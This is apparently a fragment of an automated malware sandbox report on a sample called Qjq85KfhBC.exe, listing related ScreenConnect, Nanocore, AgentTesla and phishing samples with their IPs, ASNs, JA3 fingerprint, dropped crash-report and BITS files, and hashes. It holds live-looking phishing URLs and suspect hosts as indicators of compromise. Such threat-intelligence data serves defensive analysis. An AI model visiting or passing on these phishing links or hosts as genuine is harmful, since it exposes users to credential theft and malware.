                                                                                                                                                                                                                                  Iw6bIFfJSu.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  GdVSN8ISU4.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  kjh231a.zapto.orgxrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  Iw6bIFfJSu.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comxrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 217.20.57.18
                                                                                                                                                                                                                                  AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 217.20.57.18
                                                                                                                                                                                                                                  https://accesspage853.ubpages.com/4k5-ffdfgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 217.20.57.19
                                                                                                                                                                                                                                  https://thegramp.nimbusweb.me/share/11336505/nigrk0yirmsg8qt4s4nmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                  • 217.20.57.25
                                                                                                                                                                                                                                  https://coinbase-team.net-s07.live/Zendesk/invite/ca2fd752-4355?rid=Ztd9NzCGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 217.20.57.27
                                                                                                                                                                                                                                  Gcca4WygdZ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 217.20.57.34
                                                                                                                                                                                                                                  l4MyhIt40P.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 217.20.57.39
                                                                                                                                                                                                                                  Gcca4WygdZ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 217.20.57.35
                                                                                                                                                                                                                                  https://ek3k.workspectrumhub.com/bdDURYAVGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                  • 217.20.57.22
                                                                                                                                                                                                                                  https://realestatemania.ca/kxyNao-7Ms6e-WBJnj-uMnVb-7gZJL-v8aOp.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 217.20.57.18

                                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  OTAVANET-ASCZxrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  gunzipped.exeGet hashmaliciousNanocoreBrowse
                                                                                                                                                                                                                                  • 79.110.49.176
                                                                                                                                                                                                                                  z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185

                                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0exrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  https://beta.adiance.com/wp-content/plugins/arull.php?7096797967704b5369323074645079557a5054436e4e5379314f7a644d725474524c7a732f564c7a4f4b794d6a574277413dhttps://digidunesen.sa.com/v2Xhk/#X%5Bemail%5DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  SecuriteInfo.com.Gen.Variant.Jaik.244817.4008.28987.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0&c=E,1,2fln-18Rcg-_y13WFwFZvQn3f1CXlYk0J_eiM8RKZuA6Djx49SsFA5in1hnyQJXLjWW1L6y7WaZ9eFSqcAvQerMcOF3C93rx-F5tfSihNA,,&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  https://8i.eryonficket.com/g60ff/#aGVzc2dyb3VwaW52QGhlc3MuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NngTeRowYVzfBggLgr0jnYTDMmRw1imFIm2ET99YaDpZTcYzDf4_j-5YFTogaUxno5U6mNO7vBpPu8_Qjtn233vjPaHL2UbGDlhZQdGA3D25CwqECHxQCRtUKDBEqYowFBHIAzLTnKpBZet0FyIbh36NsUUZbSRWq6o0ZyOmIf1hCVhGuO6UGV5eawzRsIwkKvzidjgnmqdlkZtGukb6XGa_iBxPDbSv-k30p9lo3wdD1QatTUJJEohlFBchxhBckADPJi-N1FZ3iloNeeN8qyMNfc5Ys1judUQjU1gwK5EC2qllcEVWuSrLoChCMIK0bJx3mPJ19_Q6xTN6_Zu96Pc7y6XXfCBdt0HNrv0PBZaGs3DaTjQy2mYbupspnNefrFYvM3J35vc35X37_6zGK5f_2fVvaX7a1xVnPf0z2a5XZydZJdxPiwTRro9fX4wlOTmAb-lz_0effAv103-GQAA__9hXKLJGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 79.110.49.185

                                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exexrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                      X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                        AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                          z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                            wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                              3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                  wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                    3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse

                                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                                                                                                      Entropy (8bit):0.88077366431059
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:0JVRkX56mk0alaS0aHH0anjJ8PUWJ81s5J8RMvCxwtYD0pQoltqNeveEQYQ1aG9c:0J7adfWuK0p/QDfKoPeuP0aN4fqoxb
                                                                                                                                                                                                                                                      MD5:EB0DE4B6E58C6CF56FBB9ED399BDA4A0
                                                                                                                                                                                                                                                      SHA1:95FAC8724D9BBA52869FB204D63F20151A67C8E8
                                                                                                                                                                                                                                                      SHA-256:E522C9B72D470C31BC27C8A27B445DE0D7195FDAB698CBE1CFF60F5721A86679
                                                                                                                                                                                                                                                      SHA-512:44C9CAE9B930B4850C520158CFF55897B34D2361EF5D880B84F31D79FD9DEC8A771C2DFBEE79297FECEFF23241EC54F068A9480F051E8A3337C3038E077D7B97
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2.e.........@..@12...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................K<...kS..#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x5f1e8a73, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                                                                                                      Entropy (8bit):0.7880806865590014
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:fSB2ESB2SSjlK/lv4T9DY1k0aXjJ8VQVYkr3g16iq2UPkLk+kYv/gKr51KrgzAkv:fazaPv4V4fXq2UaB
                                                                                                                                                                                                                                                      MD5:EF575398C1F3C586410C0003117E6038
                                                                                                                                                                                                                                                      SHA1:DAF7F66626FE04223E25273BF04DEAF70383F177
                                                                                                                                                                                                                                                      SHA-256:27D72BF450C8553E258EC889CFD040761DB0E7CF4D7DC1171A96E07E9B846CFF
                                                                                                                                                                                                                                                      SHA-512:F1E3E2D0EEC6F411E5ACCA71761092A8440EF3798A037817A3B1812DCA90A28EF6EF83D279EDE2840C85A9EDF07648C9861D86B06F3E774EC313CA80657946F2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:_..s... ...............X\...;...{......................X............{.......|..h...........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......12...{...............................................................................................................................................................................................2...{...................................P.......|.6................&........|...........................#......h.......................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                                                                                                      Entropy (8bit):0.08085146930093884
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:mni/KYedL8vi1XlVG0+q2Iqe8lAjtll/ollNTt/4ll/Q6beV/:mi/KzdL1GE8lAB/AHtc6V
                                                                                                                                                                                                                                                      MD5:AFA8FC3BF33810F7204FEB3C1B29D6AE
                                                                                                                                                                                                                                                      SHA1:652F62463B430DD36649F33A764DDE45343AAFBB
                                                                                                                                                                                                                                                      SHA-256:F70C014728F7AA312FFE535230578D57CB6925DF99C2EAA0AF0EE1563AB88AB5
                                                                                                                                                                                                                                                      SHA-512:30D5096731D2C3931168F7D717622114447A70D4140B600895AFC1AAD9119EF86EC2DF981649B18224D1F624E26B8FF04703C10FCEB2BC89312598DD6E88C1C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...B.....................................;...{.......|.......{...............{.......{....:......{.................&........|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Qjq85KfhBC.exe_daf3d5c713be60c31f28bdc3a763cd41c962bc7d_fd58a4f4_8a4be26c-4141-4233-baf7-0c752d32c8e0\Report.wer

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):0.9129777971610298
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:BdFkkoZKsOhqnGXyf8QXIDcQvc6QcEVcw3cE/3+HbHg/Jg+OgBCXEYcI+1sTJvM6:7AZK+X0BU/Qji0ozuiFMZ24IO8O
                                                                                                                                                                                                                                                      MD5:2C62387064E8B284056A6246D2B9A110
                                                                                                                                                                                                                                                      SHA1:0941F53FCEEDE28CC851F28C90AE67E0B0ADBA21
                                                                                                                                                                                                                                                      SHA-256:70901AA53217927428AE537EB31FBBACFAB2F13980A0FB37D04E55936364A491
                                                                                                                                                                                                                                                      SHA-512:2AD4D220CF90397CCEF941B80B4D1E7BC69D5F36F8974E7C50769CE9E7BEFFC05D1BD1EB6C34BEE38DBA7892EAB51376F62E64337E155A49F595944537B91C53
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.3.5.0.8.3.5.0.6.8.6.3.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.3.5.0.8.3.5.9.2.8.0.1.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.4.b.e.2.6.c.-.4.1.4.1.-.4.2.3.3.-.b.a.f.7.-.0.c.7.5.2.d.3.2.c.8.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.b.2.6.b.d.b.-.b.2.8.c.-.4.0.b.9.-.a.9.c.9.-.1.0.e.e.f.4.c.9.2.6.2.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Q.j.q.8.5.K.f.h.B.C...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.e.0.-.0.0.0.1.-.0.0.1.3.-.6.e.5.5.-.b.9.2.0.0.3.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.0.0.0.1.9.0.5.3.8.2.2.e.5.0.2.f.c.e.0.5.1.a.8.0.6.c.4.5.7.f.0.0.0.0.f.f.f.f.!.0.0.0.0.f.3.3.3.3.b.1.a.f.f.0.e.5.c.a.f.d.2.b.b.b.9.6.4.5.7.1.6.5.f.2.3.1.d.0.d.c.7.3.e.!.Q.j.q.8.5.K.f.h.B.C...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8FBC.tmp.dmp

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Fri Oct 25 17:27:15 2024, 0x1205a4 type
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):77704
                                                                                                                                                                                                                                                      Entropy (8bit):1.746996583444887
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:6wZYdkhI/bMEV1APHtVShkjPgovFKfZE:fKOhI/oEV1qtVShQPrFKBE
                                                                                                                                                                                                                                                      MD5:B8573B212402869BC6EA58ED363342EB
                                                                                                                                                                                                                                                      SHA1:57D9478D8ED1B2A40E385DFEC8FAF4577F8219EC
                                                                                                                                                                                                                                                      SHA-256:4986E6C9510E014FE4BEC080BD969C5FC6A6A760FF05D88BA8E7B876D60F828A
                                                                                                                                                                                                                                                      SHA-512:120CC9225252698C9316E5247CBBFBB816A8EDABB1CB3549E3667730D889555F2AF25F0A5D4F4A6FC52D3E6CDD6726C7208D792E829713B0E7C4B9547E5EEF9E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MDMP..a..... ..........g.........................................;..........T.......8...........T............!.............. ...........................................................................................eJ..............GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER91B1.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8330
                                                                                                                                                                                                                                                      Entropy (8bit):3.7058853145838024
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJ/t6L6DT6YWWSUATAgmfetMprX89bHHAsf4NHm:R6lXJF6GDT6YHSUAUgmfetZHHTfWG
                                                                                                                                                                                                                                                      MD5:C4BD472357639B7CD9CC1CCCB706BA9D
                                                                                                                                                                                                                                                      SHA1:8589BCA3E4491DC95B7B014FEBCAF2080F109700
                                                                                                                                                                                                                                                      SHA-256:CB2D86B98470FD9A6130BE757D514CC9206E7A38BAAF5561D0B322DF1A8B09BA
                                                                                                                                                                                                                                                      SHA-512:621C982C1117C3859707D3A2BD540D10DE94217A1EAB00AF702F43B9F8629E5DA723AD6F4B0CA2C55A7763106D719075DE2AF4890D39DB161CCDE26EE514693E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.4.8.<./.P.i.

                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER91E1.tmp.xml

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4593
                                                                                                                                                                                                                                                      Entropy (8bit):4.489097738988475
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsWJg77aI9idWpW8VYZYm8M4JW4LFbQj+q8FUmoMq7xnd:uIjfsI7cs7VVJWFe+7xnd
                                                                                                                                                                                                                                                      MD5:88481ED21003170DCE4267D6A4353E86
                                                                                                                                                                                                                                                      SHA1:AB4915F46769E62730DE99062F100D75B4C0B738
                                                                                                                                                                                                                                                      SHA-256:18B4F9EDBDDB5C5DF59ECD45BE037A6B28D30EBDB1EDA2C78D4A28E7948CC766
                                                                                                                                                                                                                                                      SHA-512:4A757640A01DD6FB8EE3810225E1A4A9BFB7B23364FEBE64A22752B07391D2128BD9AE81DB255EF14F71E634A5CB5AAB68902224B2CCC25AE430A16F37D3A108
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="559229" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER91EF.tmp.csv

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):89038
                                                                                                                                                                                                                                                      Entropy (8bit):3.0927724706776085
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:55+3KNAn0v+0NAxPR32FFtTimBUAdZB2baVBtS5ZdF5joI6Am/7C5xs535M1dmzp:55+3KNAn0v+0NAxPR32FFtTimBUAdZAk
                                                                                                                                                                                                                                                      MD5:CDC4634B17E5C770D1B176DAA2E251A0
                                                                                                                                                                                                                                                      SHA1:519E18FF5005B2107BA276F00914964B86C28CA4
                                                                                                                                                                                                                                                      SHA-256:1F4DE2696BE1AD939E82B9F96785A487543705F68FDF5E7012707B484A5979CB
                                                                                                                                                                                                                                                      SHA-512:C194B3F71A8BEE09FCC4D2795A5F14D39F6388473DEE79E23B3DFFA3DE893F5153CE9E856C4BAE4302582419FD45E2C4CC51D5C68C37E9BD22BDD54C1448A6DF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER924D.tmp.txt

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13340
                                                                                                                                                                                                                                                      Entropy (8bit):2.6864126695205797
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:TiZYWRD1ZTVYRlYNWbH8YEZeqt+iWkg5/wcrEjHa+5IGM272o2IIo3:2ZDRB0LVSa+5TM2SoxIo3
                                                                                                                                                                                                                                                      MD5:204CC550F931BDD5D236FEB4AD4DCEF6
                                                                                                                                                                                                                                                      SHA1:DEC6E102A8A04424F6A3390C69EE3D691EF9BA8A
                                                                                                                                                                                                                                                      SHA-256:5AC14B51D2E7078EA819BC84764B5717188D180BD25975EC030980C50FB8790B
